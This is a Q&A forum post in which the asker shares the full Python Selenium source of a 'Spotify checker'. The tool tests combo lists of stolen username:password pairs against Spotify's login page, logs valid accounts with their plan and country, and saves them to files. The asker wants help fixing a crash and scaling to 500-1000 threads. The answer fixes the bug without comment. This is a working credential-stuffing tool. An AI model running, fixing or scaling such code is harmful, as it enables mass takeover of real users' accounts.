# Fixing The Threads Error IN This Checker And Making It Accept More Threads

Tags: python, python-3.x, selenium, selenium-webdriver, python-multithreading

So I have made a Spotify checker which has threading but it breaks after some time giving me this error AND won't accept more then 10 threads. I don't know why the whole code is this and if possible please can someone edit the code so it does not break and make it so it has more threads like 500-1000 and this is the error:

```
Exception in thread Thread-4:
Traceback (most recent call last):
  File "C:\Users\Administrator\AppData\Local\Programs\Python\Python38-32\lib\threading.py", line 932, in _bootstrap_inner
    self.run()
  File "<frozen checker>", line 268, in run
  File "<frozen checker>", line 155, in init
  File "<frozen checker>", line 163, in verify_bombo
  File "<frozen checker>", line 240, in verify_account
UnboundLocalError: local variable 'country' referenced before assignment
```

```
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
from tkinter.filedialog import askopenfilename
from tkinter import Tk
import datetime
import subprocess
import requests

import time, os 

from threading import Thread, RLock
import random
from colorama import init
from colorama import Fore, Style
import os, sys, time, traceback, pickle, random, colorama
from sys import stdout
import ctypes
import msvcrt
from ctypes import wintypes
os.system("mode con cols=300 lines=300")

hwid = subprocess.check_output('wmic csproduct get uuid').decode().split('\n')[1].strip()
from time import sleep
time.sleep(2)
r = requests.get('https://pastebin.com/bs61yxUS')

try:
   if hwid in r.text:
       pass
   else:
       text = """                                   

███████ ██████   ██████  ████████ ██ ███████ ██    ██      ██████ ██   ██ ███████  ██████ ██   ██ ███████ ██████  
██      ██   ██ ██    ██    ██    ██ ██       ██  ██      ██      ██   ██ ██      ██      ██  ██  ██      ██   ██ 
███████ ██████  ██    ██    ██    ██ █████     ████       ██      ███████ █████   ██      █████   █████   ██████  
     ██ ██      ██    ██    ██    ██ ██         ██        ██      ██   ██ ██      ██      ██  ██  ██      ██   ██ 
███████ ██       ██████     ██    ██ ██         ██         ██████ ██   ██ ███████  ██████ ██   ██ ███████ ██   ██ 
                                                                                                                  
                                                                                                                 

                                                                                            
                                                                                           - Made By MarsBros\n
       """
       bad_colors = ['LIGHTCYAN', 'RED']
       codes = vars(colorama.Fore)
       colors = [codes[color] for color in codes if color in bad_colors]
       colored_chars = [random.choice(colors) + char for char in text]
       print(''.join(colored_chars))


       print('[ERROR] Your Not Registered With Mars ')
       print(f'HWID: {hwid}') 
       time.sleep(5)
       os._exit(0)
except:
   print('[ERROR] Failed to connect to database')
   time.sleep(5) 
   os._exit(0) 
   text = """                                   

███████ ██████   ██████  ████████ ██ ███████ ██    ██      ██████ ██   ██ ███████  ██████ ██   ██ ███████ ██████  
██      ██   ██ ██    ██    ██    ██ ██       ██  ██      ██      ██   ██ ██      ██      ██  ██  ██      ██   ██ 
███████ ██████  ██    ██    ██    ██ █████     ████       ██      ███████ █████   ██      █████   █████   ██████  
     ██ ██      ██    ██    ██    ██ ██         ██        ██      ██   ██ ██      ██      ██  ██  ██      ██   ██ 
███████ ██       ██████     ██    ██ ██         ██         ██████ ██   ██ ███████  ██████ ██   ██ ███████ ██   ██ 
                                                                                                                  
                                                                                                             

                                                                                        
                                                                                       - Made By MarsBros\n
   """
   bad_colors = ['LIGHTCYAN', 'RED']
   codes = vars(colorama.Fore)
   colors = [codes[color] for color in codes if color in bad_colors]
   colored_chars = [random.choice(colors) + char for char in text]
   print(''.join(colored_chars))

verrou = RLock()
Tk().withdraw()
init()

bad = 0
good = 0
lignes_count = 0
combo_filename = 0
threads_count = 0
chrome_options = ' '
headless_mode = True

def clear():
   
   os.system("cls" if os.name == "nt" else "echo -e \\\\033c")
   os.system("mode con: cols=300 lines=300")

def logo():
   try:
       text = """                                   

███████ ██████   ██████  ████████ ██ ███████ ██    ██      ██████ ██   ██ ███████  ██████ ██   ██ ███████ ██████  
██      ██   ██ ██    ██    ██    ██ ██       ██  ██      ██      ██   ██ ██      ██      ██  ██  ██      ██   ██ 
███████ ██████  ██    ██    ██    ██ █████     ████       ██      ███████ █████   ██      █████   █████   ██████  
     ██ ██      ██    ██    ██    ██ ██         ██        ██      ██   ██ ██      ██      ██  ██  ██      ██   ██ 
███████ ██       ██████     ██    ██ ██         ██         ██████ ██   ██ ███████  ██████ ██   ██ ███████ ██   ██ 
                                                                                                                  
                                                                                                                 

                                                                                            
                                                                                           - Made By MarsBros\n
       """
       bad_colors = ['LIGHTCYAN', 'RED']
       codes = vars(colorama.Fore)
       colors = [codes[color] for color in codes if color in bad_colors]
       colored_chars = [random.choice(colors) + char for char in text]
       print(''.join(colored_chars))

   except KeyboardInterrupt:
       sys.exit()

try:
   # Python 2
   xrange
except NameError:
   # Python 3
   xrange = range

class Spotify_checker:
   def __init__(self, combo, rep):
       global chrome_options
       global headless_mode

       self.combo = combo
       self.result_rep = rep

       self.chrome_options = webdriver.ChromeOptions()
       self.chrome_options.add_experimental_option("excludeSwitches", ["enable-logging"])

       if headless_mode == True:
           self.chrome_options.add_argument("--headless")
       elif headless_mode == False:
           pass
       else:
           pass
       
       
       self.driver = webdriver.Chrome(options = self.chrome_options)

       self.result = {'Wrong' : 0, 'Other' : [0, ""],'Free' : [0, ""],'Premium' : [0, ""],'Premium Duo': [0, ""],'Student' : [0, ""],'Family Owner' : [0, ""], 'Family Member' : [0, ""]} 
       
       self.verify_combo()
       
       self.driver.quit()
       
       
   def verify_combo(self):
       
       for a in self.combo:
           
           if (self.verify_account(a[0],a[1]) == -1):
               print("[ERROR]: {0}:{1}".format(a[0],a[1]))
   
   def verify_account(self, u, p):
       global bad
       global good
       global lignes_count

       os.system('title ' + ' [Spotify Account Checker Made By Mars Bros] ~ Checking [{}/{}] - Good: {} - Bad: {}'.format(good + bad, lignes_count, good, bad))
       self.driver.get("https://accounts.spotify.com/en/login")
       
       wait = WebDriverWait(self.driver, 3)
       try:
           wait.until(EC.presence_of_element_located((By.ID, 'login-username')))
       except:
           self.driver.get("https://www.spotify.com/logout")
           return -1
   
       user = self.driver.find_element_by_id("login-username")
       user.clear()
       user.send_keys(u)
       self.driver.find_element_by_id("login-password").send_keys(p)
       self.driver.find_element_by_class_name("btn-green").click()
       
       wait = WebDriverWait(self.driver, 3)

       try:
           wait.until(EC.element_to_be_clickable((By.XPATH, '//*[@id="account-settings-link"]'))).click()
           time.sleep(1)
       except:
           bad += 1
           print(Fore.RED + '[BAD]: ' + u + ':' + p + Fore.RESET)
           self.result["Wrong"] += 1
           return 0

       try:
           cookie = self.driver.find_element_by_xpath('//*[@id="onetrust-accept-btn-handler"]').click()
           time.sleep(1)
       except:
           pass
       try:
           account_statut = self.driver.find_element_by_xpath('//*[@id="your-plan"]/section/div/div[1]/div[1]/span')
           time.sleep(2)
       except NoSuchElementException:
           print('{}[>] {}Account Status Error {}'.format(Fore.RESET, Fore.LIGHTYELLOW_EX, Fore.RESET))
           self.driver.get("https://www.spotify.com/logout")
           return -2
       
       if(account_statut.text == u"Spotify Free"):
           a_c = "Free"

       elif(account_statut.text == u"Spotify Premium Duo"):
           a_c = "Premium Duo"
           
       elif(account_statut.text == u"Spotify Premium"):
           a_c = "Premium"
           
       elif(account_statut.text == u"Premium for Students"): 
           a_c = "Student"
       
       elif (account_statut.text == u"Spotify Premium Family"):
           try :
               t = self.driver.find_element_by_xpath("//div[@id='account-csr-container']/div[1]/article[2]/section[1]/div[1]/div[2]/div[1]/div[1]/div[2]/div/h3").text
               if t == u"Payment":
                   a_c = "Family Owner"
           except:
               a_c = "Family Member"
               
       else:
           a_c = "Other"
       
       try: 
           country = self.driver.find_element_by_xpath('//*[@id="__next"]/div/div/div[2]/div[3]/div[2]/div/article[1]/section/table/tbody/tr[4]/td[2]').text
       except:
           pass

       good += 1
       print(Fore.LIGHTGREEN_EX + '[GOOD]: ' + u + ':' + p + ' | ' + 'Capture: ' + a_c + ' | ' + 'Country: ' + country + Fore.RESET)
       self.result[a_c][0] += 1
       self.result[a_c][1] += "{0}:{1} | {2}\n".format(u,p,country)
       self.save_data("{0}:{1} | {2}\n".format(u,p,country), a_c)
       
       self.driver.get("https://www.spotify.com/logout")
       self.driver.delete_all_cookies()
       
       return 1
   
       
   def save_data(self, data, data_t):
      
       with verrou :
           with open('{0}/{1}.txt'.format(self.result_rep,data_t), 'a') as f: 
               f.write( data )
               f.close()
       

class ThreadedTask( Thread ):
   def __init__(self, func, *args):
       
       Thread.__init__(self)
       self.func = func
       self.args = args
       
   def run(self):
       
       self.result_task = self.func(*self.args)
       return 1
   
   
class Main:

   def __init__(self,combo_list, thread):
       
       start_time = time.time()
       
       self.thread_nb = thread
       self.combo_list_f = combo_list
       self.load_combo()
       self.create_rep()
       
       if (self.thread_nb == 1 or len(self.combo) < 10) :
           self.Thread  = Spotify_checker(self.combo, self.result_rep)
           self.result = self.Thread.result
           
       else:
           combo_part = int(len(self.combo)/self.thread_nb)
           
           self.Thread = [ ThreadedTask(Spotify_checker, self.combo[i * combo_part : (i *combo_part) + combo_part] if i != self.thread_nb -1 else self.combo[i * combo_part : (i * combo_part) + combo_part + self.thread_nb % len(self.combo)], self.result_rep ) for i in xrange(self.thread_nb)]
           
           for t in self.Thread: 
               t.start()
           for t in self.Thread:
               t.join()
                      
           self.result = {}
           for T in self.Thread:
               for key, value in T.result_task.result.items():
                   self.result[key] = self.result[key] + value if type(value) == int and key in self.result.keys() else [self.result[key][0] + value[0], self.result[key][1] + value[1]] if key in self.result.keys() and type(value) == list else [value[0],value[1]] if type(value)==list else value  
           
           print('  ')
           print(Fore.RESET + "[>] " + Fore.LIGHTYELLOW_EX + "Finished in: %s secondes ---" % datetime.timedelta(seconds=time.time() - start_time ))
           print(Fore.RESET)


   def load_combo(self):
       
       with open(self.combo_list_f, 'r') as f:
           self.combo = [ [i.split(':')[0], i.split(':')[1]] for i in f.read().split('\n') ]
   
   def create_rep(self):
       
       if not os.path.isdir('results/'):
           os.makedirs('results')
           
       self.result_rep = 'results/'+time.strftime("%Y-%m-%d %Hh%M")
       try:
           os.makedirs(self.result_rep)
       except FileExistsError:
           pass

def opencombo():
   global combo_filename
   while True:
       combo_filename = askopenfilename(filetypes =(("Text File", "*.txt"),("All Files","*.*")), title = "Open your combolist.")
       try:
           with open(combo_filename,'r') as UseFile:
               print(Fore.RESET + '[>] ' + Fore.LIGHTYELLOW_EX + combo_filename + Fore.RESET) 
           break
       except:
          print('{}[>] {}"Bruh U Didnt Select A Combo :/" {}'.format(Fore.RESET, Fore.LIGHTYELLOW_EX, Fore.RESET))
          time.sleep(1)
          continue

def threads_number():
   global threads_count
   while True:
       try:
           threads_count = input('{}\n[>] {}How many Threads ( I Recommend 500-1000) ?: {}'.format(Fore.RESET, Fore.LIGHTYELLOW_EX, Fore.RESET))
           threads_count = int(threads_count)
           if threads_count > 20:
               print('{}\n[>] {}You have entered too many Threads!{}'.format(Fore.RESET, Fore.LIGHTYELLOW_EX, Fore.RESET))
               continue
           elif threads_count <= 20:
               break
       except:
           continue
           

if __name__ == "__main__":
   try:
       clear()
       logo()
       print('{}\n[>] {}Press enter to open your combolist {}'.format(Fore.RESET, Fore.LIGHTYELLOW_EX, Fore.RESET))
       input()
       opencombo()
       while True:
           headless = input(str('{}\n[>] {}Do U Want It In Headless mode ? (hide browser windows & And Makes It Faster) {}[Y/N]: '.format(Fore.RESET, Fore.LIGHTYELLOW_EX, Fore.RESET)))
           if headless == "Y":
               headless_mode = True
               break
           elif headless == "N":
               headless_mode = False
               pass
               break
           else:
               print('{}\n[>] {}Type only Y or N{}'.format(Fore.RESET, Fore.LIGHTYELLOW_EX, Fore.RESET))
               continue
       lignes_count = sum(1 for _ in open(combo_filename))
       threads_number()
       time.sleep(1)
       clear()
       logo()
       print('{}\n[>] {}Starting... {}'.format(Fore.RESET, Fore.LIGHTGREEN_EX, Fore.RESET))
       print('  ')
       main = Main(combo_filename, threads_count)
   except KeyboardInterrupt:
       sys.exit()
```

Comment: The error says you are referencing `country` before assignment. In your case it seems likely that an exception is being thrown in `find_element_by_xpath` and `country` is not set to anything. Try `country = None; country = self.driver.find_ ...`

Comment: so u mean i covert this ```country = self.driver.find_element_by_xpath('//*[@id="__next"]/div/div/div[2]/div[3]/div[2]/div/article[1]/section/table/tbody/tr[4]/td[2]').text``` into this ```country = None; country = self.driver.find_element_by_xpath('//*[@id="__next"]/div/div/div[2]/div[3]/div[2]/div/article[1]/section/table/tbody/tr[4]/td[2]').text```

Comment: No, `country = None; country = self.driver.find_ ...`. There are two assignments here. The first dummy assignment effectively created the variable `country`, just in case  the `find_element_by_xpath` call throws an exception.

Comment: I dont really get it sir can u maybe edit my code above and send me it as a whole

Comment: (btw, you have posted *far* too much code. You have posted some of the error traceback which helped a lot, but it should also have guided you to post just the code around the site of the error.)

Answer (score 0):

You should try this pattern of assigning to `country` to see if this is what you need. It will eliminate your current error, but I'm not sure how much further it will get you:

```py
       country = None
       try: 
           country = self.driver.find_element_by_xpath('//*[@id="__next"]/div/div/div[2]/div[3]/div[2]/div/article[1]/section/table/tbody/tr[4]/td[2]').text
       except:
           pass
```